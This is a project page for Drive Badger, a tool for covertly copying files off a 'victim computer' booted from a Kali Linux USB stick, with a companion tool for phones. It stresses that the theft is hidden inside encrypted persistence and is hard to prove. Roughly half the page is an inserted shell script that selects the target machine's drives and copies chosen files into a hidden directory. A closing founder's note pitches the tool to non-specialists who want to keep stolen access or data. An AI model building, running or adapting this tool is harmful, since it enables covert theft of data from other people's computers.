Drive Badger: open source platform for covert data exfiltration operations, ranging from small computers to big servers.

Drive Badger and Mobile Badger

Drive Badger is split into 2 separate products:

  • Drive Badger itself, based on Kali Linux, meant for data exfiltration from "normal" (non-mobile) computers
  • Mobile Badger, based on Debian/Ubuntu/Raspbian, meant for data exfiltration from mobile devices (phones, tablets, photo cameras etc.)

Drive Badger and Mobile Badger however share:

  • most source code parts (and the same repository)
  • the same exclusion rules
  • the same drive encryption keys
  • the same hooks

Design and usage safety

Drive Badger is built on top of Kali Linux. Thus it leverages mechanisms like:

  • udevd and systemd for hard drive identification
  • the Kali encrypted persistence feature, so that the persistent partition (where the copied data lands) is LUKS-encrypted
  • Kali Linux itself as cover (you can run anything on screen while the copy runs in the background)

There is no way to distinguish Drive Badger from ordinary Kali Linux, or to prove that data exfiltration took place, unless:

  • someone knows the proper LUKS passphrase
  • it is caught in the act, e.g. via the process list or the mounted volumes (including after the copy has finished, while Kali Linux is still running)
  • the non-encrypted persistent partition is used (it is required on some old platforms)

Mobile Badger is built on top of Debian Linux with systemd version 229 or newer, or any Debian derivative, e.g. Ubuntu or Raspbian. More details are provided in its dedicated Wiki.

How it works

  • operator connects the Drive Badger USB drive to the victim computer

  • operator boots "Live USB Encrypted Persistence"

  • Kali Linux starts in text mode (at this point the operator can run startx to enter graphical mode)

  • the /etc/rc.drivebadger script is run in the background

  • it enumerates all local hard drives, including RAID devices, BitLocker-encrypted drives etc., and copies "interesting" files (selected by the configuration rules) to a special hidden subdirectory on the persistent partition
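The steps above, as an added example that is not Drive Badger's own code: a POSIX sh sketch of the two decisions the background script has to make (which local devices are targets, and which files are "interesting"), run on constructed input. It assumes device information in `lsblk -P -o NAME,TYPE,FSTYPE,MOUNTPOINT` form, that the operator's own stick is known by device name, that exclusion rules are shell glob patterns relative to the mount root, and a hidden destination directory named `.badger`; all of these are assumptions of this example, as the page does not show the project's real rule syntax or directory layout. Mounting each target (e.g. opening a BitLocker volume) is left out.

```shell
#!/bin/sh
# Added example, not Drive Badger's own code. Assumptions: lsblk -P input,
# boot stick known by device name, glob exclusion rules, ".badger" is a
# made-up destination directory name.

# Print "NAME FSTYPE" for every partition, assembled RAID or opened dm-crypt
# device that carries a usable filesystem. Skipped: swap, RAID members (the
# assembled md device is used instead), anything on the boot stick, and
# anything already mounted (on a live boot, mounted volumes belong to the
# live system, not to the target machine).
select_targets() {
    listing="$1"      # file with lsblk -P lines
    boot_dev="$2"     # e.g. sdb: the live USB drive itself
    while IFS= read -r line; do
        name=$(printf '%s\n' "$line" | sed -n 's/^NAME="\([^"]*\)".*/\1/p')
        kind=$(printf '%s\n' "$line" | sed -n 's/.* TYPE="\([^"]*\)".*/\1/p')
        fstype=$(printf '%s\n' "$line" | sed -n 's/.* FSTYPE="\([^"]*\)".*/\1/p')
        mnt=$(printf '%s\n' "$line" | sed -n 's/.* MOUNTPOINT="\([^"]*\)".*/\1/p')
        case "$kind" in part|raid*|crypt) ;; *) continue ;; esac
        case "$name" in "$boot_dev"*) continue ;; esac
        case "$fstype" in ""|swap|linux_raid_member) continue ;; esac
        [ -n "$mnt" ] && continue
        printf '%s %s\n' "$name" "$fstype"
    done < "$listing"
}

# Copy every regular file below a mounted source root into the hidden
# destination, unless its path relative to that root matches one of the
# exclusion globs (one per line, blank lines ignored). Paths containing
# newlines are not handled by this find|read loop.
collect_files() {
    src="$1"; dst="$2"; excl="$3"
    find "$src" -type f | while IFS= read -r f; do
        rel="${f#"$src"/}"
        skip=0
        while IFS= read -r pat; do
            [ -z "$pat" ] && continue
            case "$rel" in $pat) skip=1; break ;; esac
        done < "$excl"
        [ "$skip" -eq 1 ] && continue
        mkdir -p "$dst/$(dirname "$rel")"
        cp -p "$f" "$dst/$rel"
    done
}

# Constructed sample input: a made-up lsblk listing and a tiny file tree.
# Sets DEMO_WORK to the scratch directory it used.
demo() {
    DEMO_WORK=$(mktemp -d)
    cat > "$DEMO_WORK/lsblk.txt" <<'EOF'
NAME="sda" TYPE="disk" FSTYPE="" MOUNTPOINT=""
NAME="sda1" TYPE="part" FSTYPE="ntfs" MOUNTPOINT=""
NAME="sda2" TYPE="part" FSTYPE="swap" MOUNTPOINT=""
NAME="sda3" TYPE="part" FSTYPE="BitLocker" MOUNTPOINT=""
NAME="sdc" TYPE="disk" FSTYPE="" MOUNTPOINT=""
NAME="sdc1" TYPE="part" FSTYPE="linux_raid_member" MOUNTPOINT=""
NAME="md0" TYPE="raid1" FSTYPE="ext4" MOUNTPOINT=""
NAME="sdb" TYPE="disk" FSTYPE="" MOUNTPOINT=""
NAME="sdb1" TYPE="part" FSTYPE="vfat" MOUNTPOINT="/run/live/medium"
NAME="sdb2" TYPE="part" FSTYPE="crypto_LUKS" MOUNTPOINT=""
NAME="persist" TYPE="crypt" FSTYPE="ext4" MOUNTPOINT="/run/live/persistence/persist"
EOF
    mkdir -p "$DEMO_WORK/src/Users/alice/Documents" \
             "$DEMO_WORK/src/Users/alice/AppData/Local/Cache" \
             "$DEMO_WORK/src/Windows/System32"
    echo "quarterly plan" > "$DEMO_WORK/src/Users/alice/Documents/plan.docx"
    echo "cache junk"     > "$DEMO_WORK/src/Users/alice/AppData/Local/Cache/a.tmp"
    echo "not a real iso" > "$DEMO_WORK/src/Users/alice/big.iso"
    echo "system dll"     > "$DEMO_WORK/src/Windows/System32/kernel32.dll"
    printf '%s\n' 'Windows/*' '*/Cache/*' '*.iso' > "$DEMO_WORK/exclude.txt"

    select_targets "$DEMO_WORK/lsblk.txt" sdb > "$DEMO_WORK/targets.txt"
    collect_files "$DEMO_WORK/src" "$DEMO_WORK/dst/.badger" "$DEMO_WORK/exclude.txt"
}

if [ "${1:-}" = "--demo" ]; then
    demo
    echo "targets:"; cat "$DEMO_WORK/targets.txt"
    echo "copied:"; (cd "$DEMO_WORK/dst" && find . -type f)
fi
```

Run with `sh badger-sketch.sh --demo` to see the selected targets (sda1, sda3 and md0 in the constructed listing) and the copied files (only plan.docx survives the three exclusion rules). Everything this sketch does, the mounts, the find/cp process and the disk activity, is visible to anyone looking at the machine while it runs, which is the "caught in the act" case above.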

From the founder...

Being in the IT security business for almost 25 years, I realized that breaking protections (or preventing it) is becoming less and less important. We are not living in Outlook Express times anymore...
The key point is the ability to keep the privileges permanently, once obtained. This becomes more and more difficult as IT systems get more and more complicated - and this is exactly the goal of the Drive Badger project: to give non-ITSEC people the ability to keep either the privileges, or the outcome of a successful break-in.